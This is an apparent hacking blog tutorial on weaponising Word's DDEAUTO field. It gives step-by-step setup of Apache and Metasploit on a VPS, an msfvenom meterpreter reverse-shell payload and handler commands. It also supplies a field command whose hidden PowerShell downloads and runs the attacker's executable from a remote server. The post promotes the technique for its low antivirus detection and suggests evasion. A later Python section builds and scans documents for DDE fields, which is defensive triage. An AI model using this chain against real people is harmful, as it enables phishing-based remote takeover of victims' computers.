Hacking peeps thanks to Microsoft, DDE style!


Welcome back to another hacking tutorial, my Windows hackers! Today we will be exploiting... ERRRR, "social engineering" the "bug" (as Microsoft calls it) in Office/Word 2016!

So let’s get started!

Windows provides several methods for transferring data between applications. One method is the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. The part we care about: a Word field code can name any program as the DDE "server", and Word will launch that program (with our arguments) to start the conversation.

The first thing we will need is our trusty VPS of choice; it makes the setup easy, btw.

This exploit works even when the target computer is behind a router/NAT, because every connection (the HTTP download of the payload and the reverse TCP shell) is made outbound by the target when it opens the document, so there are no firewalls or port forwarding to mess with on the target side for this POC/exploit/bug. Only the VPS needs TCP 80 (Apache) and the handler port reachable from the internet.

Let's install Ubuntu 16.04 (1 CPU and 1 GB of RAM is plenty) on the VPS, then install Apache2 and the Metasploit Framework (msfconsole) on it:

sudo apt-get update
sudo apt-get install -y apache2 traceroute software-properties-common
sudo apt-add-repository -y ppa:brightbox/ruby-ng
sudo apt-get update
sudo apt-get install -y ruby2.4 ruby2.4-dev
# Rapid7's nightly installer script; it needs root to write to /opt/metasploit-framework
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
sudo bash msfinstall

In a basic rundown, this exploit (bug) lives in a field inside a Microsoft Word document. When the target opens it, Word asks whether to update the document's linked fields and then whether to start cmd.exe; once they click through both prompts (that is the "social engineering" part, and why Microsoft calls this a feature), the field downloads our meterpreter executable from our Apache2 server and runs it, we get a shell back, and the system is PWNED ;)

First, from a shell on the VPS (msfvenom is a standalone tool, not a command typed inside msfconsole), generate the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=VPSIPADDRESS LPORT=1337 -f exe > pwned.exe

We will then need to copy pwned.exe into Apache's publicly visible web root:
sudo cp /root/pwned.exe /var/www/html/

We will then start the handler in msfconsole so it is ready to accept the shell coming back (the original write-up stopped at the set commands; the handler has to actually be started, and ExitOnSession false keeps it listening for more than one victim):

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST yourvpsip
set LPORT 1337          (or whatever port you used in msfvenom)
set ExitOnSession false
exploit -j

Command tips:
sessions -l      lists running sessions
sessions -i 1    interacts with session number 1

You can rename "pwned.exe" to whatever you'd like to be stealthier, but then the file name (and the VPS IP address) in the .doc field below must be edited to match.

We will insert this command into the .doc file that we send to the target. The -W Hidden switch hides the PowerShell window while it downloads and runs the meterpreter pwned.exe we built for the return shell; note that cmd.exe /k keeps its own console window open after the command finishes, so the cmd window itself is not hidden. Also note that '\pwned.exe' is a path relative to the root of the current drive (typically C:\pwned.exe), not the folder that contains the .doc file. This syntax is similar to the Hancitor malware going around right now.

Here (download link) you can download a sample file I made for the POC, if you'd like.

CTRL+F9 inserts the field braces { } in Word; the DDE command goes between them (braces typed by hand are plain text, Word only treats the ones it inserts as a field):

DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -W Hidden (New-Object System.Net.WebClient).DownloadFile('http://yourserverip/pwned.exe','\pwned.exe');Start-Process '\pwned.exe'"

After the target opens the .doc file, you will get a meterpreter shell back. You will then have access to the system to do as you please ;)

This "bug, feature or exploit" currently has a low antivirus detection rate, so it is a perfect attack vector this year with all the WPA2 drama.

Below are some screenshots of the sample ERT POC .doc file that was uploaded to VirusTotal and detected by only 11 out of 60 engines. Some of the bigger AV companies like Kaspersky, AVG, Avast and Malwarebytes are not detecting this DDE flaw at the moment, probably because Microsoft says it's a "feature" and not a flaw (or something of that nature). In either case we can use this to our advantage if needed.

Note: If you get this working with the DDE command instead of DDEAUTO, antivirus detection is around 1 or maybe 2 engines, from what I've heard around Twitter (I haven't confirmed this).

Note: These VPS IPs ^^^^ will be destroyed before you read this ;)
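To make the field part concrete, here is an added example in Python (mine, not code from the original post or from any of the tools linked below). It builds a minimal .docx whose body is a single DDE or DDEAUTO field, stored the way Word stores a field created with Ctrl+F9 (fldChar begin, the code in instrText runs, fldChar separate, the cached result, fldChar end), optionally chopping the code across several instrText runs, and then scans the package and pulls every DDE field instruction back out. The scanner reassembles split runs, handles nested fields and the fldSimple form, and matches the field name case-insensitively, so neither a lowercase "ddeauto" nor a code split over many runs hides the field from it; it does not decode payloads hidden behind QUOTE fields or other field-level obfuscation. The DDEAUTO string launching calc.exe is constructed sample input, and the three-part package layout is the minimum Word accepts, not a copy of any real document.

```python
"""Build a minimal .docx carrying a DDE/DDEAUTO field, then find it again.

Added example for this post, not code from the original or from any linked
tool. The DDEAUTO strings below are constructed sample input.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
# Field names are case-insensitive in Word, so "ddeauto" works as well as "DDEAUTO".
DDE_RE = re.compile(r"^\s*(DDEAUTO|DDE)\b", re.IGNORECASE)

_CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.'
    'openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>'
)
_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/officeDocument" Target="word/document.xml"/></Relationships>'
)


def _field_xml(instr, split, simple):
    """One paragraph holding the field. Complex fields are what Ctrl+F9 creates:
    fldChar begin, the code in instrText runs, fldChar separate, the cached
    result, fldChar end. split > 1 chops the code across several instrText runs."""
    if simple:
        return ('<w:p><w:fldSimple w:instr="%s"><w:r><w:t>.</w:t></w:r></w:fldSimple></w:p>'
                % escape(instr, {'"': '&quot;'}))
    step = max(1, -(-len(instr) // max(1, split)))  # ceiling division, never 0
    runs = "".join('<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
                   % escape(instr[i:i + step]) for i in range(0, len(instr), step))
    return ('<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>%s'
            '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>.</w:t></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>' % runs)


def build_docx(instr, split=1, simple=False):
    """Return the bytes of a minimal .docx whose body is a single field."""
    document = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                '<w:document xmlns:w="%s"><w:body>%s</w:body></w:document>'
                % (W_NS, _field_xml(instr, split, simple)))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", _CONTENT_TYPES)
        z.writestr("_rels/.rels", _RELS)
        z.writestr("word/document.xml", document)
    return buf.getvalue()


def _field_codes(root):
    """Yield every field instruction in a part, reassembling complex fields
    whose code is spread over many instrText runs (nested fields are handled
    with a stack) and reading simple fields from their w:instr attribute."""
    stack = []
    for el in root.iter():
        if el.tag == W + "fldSimple":
            yield el.get(W + "instr", "")
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                yield "".join(stack.pop())
        elif el.tag == W + "instrText" and stack:
            stack[-1].append(el.text or "")


def find_dde_fields(docx_bytes):
    """Return (part name, field name, whitespace-normalised field code) for every
    DDE or DDEAUTO field in any word/*.xml part (body, headers, footers, notes)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for code in _field_codes(ET.fromstring(z.read(name))):
                    m = DDE_RE.match(code)
                    if m:
                        hits.append((name, m.group(1).upper(), " ".join(code.split())))
    return hits


if __name__ == "__main__":
    # Constructed sample: the post's DDEAUTO shape, but launching calc.exe.
    payload = r'DDEAUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe"'
    for hit in find_dde_fields(build_docx(payload, split=5)):
        print(hit)
```

Run it as a script to see the reassembled field code come back out of a document whose code was split over five runs; point find_dde_fields at the bytes of a real .docx to triage a suspicious attachment. A .doc (the binary format used in the post) is a different container and would need a separate parser; the field semantics are the same.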

More possibly useful DDE formulas:

Added link: 11/1/17
OFFICE DDEAUTO Payload Generation script to automatically create a .vbs/.hta/.js payload for use inside a Microsoft Office document.

DDE antivirus detection bypass methods

More DDE Obfuscation and evasion techniques

Useful Links:

Happy attacking!